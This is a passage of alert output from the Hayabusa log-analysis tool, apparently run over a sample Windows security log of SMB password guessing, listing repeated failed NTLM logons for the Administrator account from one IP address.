Type: 3 | Computer: riuVWV1Ugr9c22hR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:43.189 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5OSj1I0sXkPf96OL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:43.229 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KsOJDxDiZSjoBj6F | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:43.269 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: uH0bQ9zEi1xcfHn3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:43.308 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 3AfNT0p4JC1VEfDd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:43.353 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: S7T8R8U1WVHZQrYk | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:43.388 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: 
Administrator | Type: 3 | Computer: kamexpa7isWT8gLC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:43.437 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8CyHFKVcdTo0Upx3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:43.480 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: U30aMcZuBD08GWK1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:43.527 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4mihftSCNCYdlBny | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:43.553 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: K2wa0xwK6tnurGJQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:43.588 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 0V3TbNrKEnrDcEYt | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:43.629 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - 
Wrong Password,User: Administrator | Type: 3 | Computer: T73JW9JURm8Br6MA | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:43.673 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: OAleyg3h8aMvVVJk | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:43.713 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1LQllnWZFUIWa6rw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:43.757 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: hlwPxSGUmvYH0rpL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:43.801 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VrI56o5TyeO48rQV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:43.845 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: CKRMn75tv5Yi5rYK | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:43.889 
+00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MbJvec7rVisJ6WCC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:43.929 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xoubp5WTPqblBaps | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:43.965 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: rBczkR92cKY41icQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:44.005 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MfUx3OizEb1LiOzj | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:44.051 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: SRaSOLOWhBEr0qkz | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:44.085 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: YnlI8Zh4td5m1fpx | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 
+2016-09-19 16:52:44.129 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wXUDXDa4wi3HivKo | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:44.174 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: TT7iOtVMFcEysCcI | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:44.229 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1NJpI7KC3gj99aWs | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:44.333 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: H39cv9JEuLEjlp93 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:44.389 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4p9h1cjLeUzppSZb | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:44.424 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: E0fOpi4vr55QmO6x | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:44.472 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: GiKI4V6kpkY5zc9x | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:44.513 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dLmu4n9qZdf3Q5zo | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:44.547 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 87iJdX2E0ZJintvr | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:44.592 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: nxc4iIHP0kdqQNiG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:44.637 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: RJIWekwBwcIUWjD1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:44.686 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: GdnvboiIDzXTZ8MR | IP Addr: 
192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:44.740 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QGMPHNpljTlMYeet | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:44.794 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pWo4uVFtAbe4IjKC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:44.845 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: YAPdDqbMY4rYiuZ3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:44.896 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ai2WCQ3MkWwSeOy9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:44.946 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Ey1wbsD7w3fs02xP | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:44.983 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 
sVGzidwZICNfLizg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:45.029 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8zjGPMJ6RBw48Ejx | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:45.071 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MydK8AjPvyyckCEL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:45.105 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4fqkCliAQMiFffQU | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:45.149 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ITkku4kN4csBFyUB | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:45.197 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: f5g9kMkSFhKrT2Py | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:45.241 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | 
Type: 3 | Computer: 1xKLdwujTmLEc9ts | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:45.285 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: sAW1YzCQ3CreseaP | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:45.326 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: vhqBirEHOKPepR3n | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:45.376 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5uqSFXpzAWOnc90n | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:45.421 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: McbeS9lRpbMc48jO | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:45.477 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: I6J0d7dQUmJNKJlu | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:45.521 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: 
Administrator | Type: 3 | Computer: QG3WU91rhTP9odx7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:45.579 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: hSQRgB8yMfhb03g1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:45.614 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: bzbZjRXTc0XvV4Ry | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:45.665 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: k3ShOCSaLGX4YBWE | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:45.704 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: lIrydzi8nmY251Z1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:45.752 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: h4vlRksTGxAqEt9j | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:45.789 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - 
Wrong Password,User: Administrator | Type: 3 | Computer: uJMnD0foEDbcNfTj | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:45.829 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HNWppBJLFojEFtiF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:45.885 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: t7a9Tvr6ruDpiG2T | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:45.920 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: NBNIizCKz2ybc3eM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:45.961 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: YwuXQhISpgfSFqZ9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:46.011 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: yeONLdrrauxqvgaT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:46.058 
+00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: RFqSH4toadsTideV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:46.104 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HuMa0Juj1tjL6NDY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:46.145 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: UA8zU0kJ6gAFqSaF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:46.193 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jvX85gF8wk3AGJyb | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:46.241 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: OpzOMKQIBrkQW5Os | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:46.285 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: cqzrLAqHNi4CHT56 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 
+2016-09-19 16:52:46.326 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HWMap8qHlykO6Yeu | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:46.369 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pkc9LWakJBjhBQv6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:46.416 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: y43cE75gTzA1XjHF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:46.457 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 9HopaYDAbYxHjJEr | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:46.499 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: brNgudTWJaKs8nLd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:46.597 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MzPwOqU92kdGodBH | IP Addr: 192.168.198.149 | AuthPackage: 
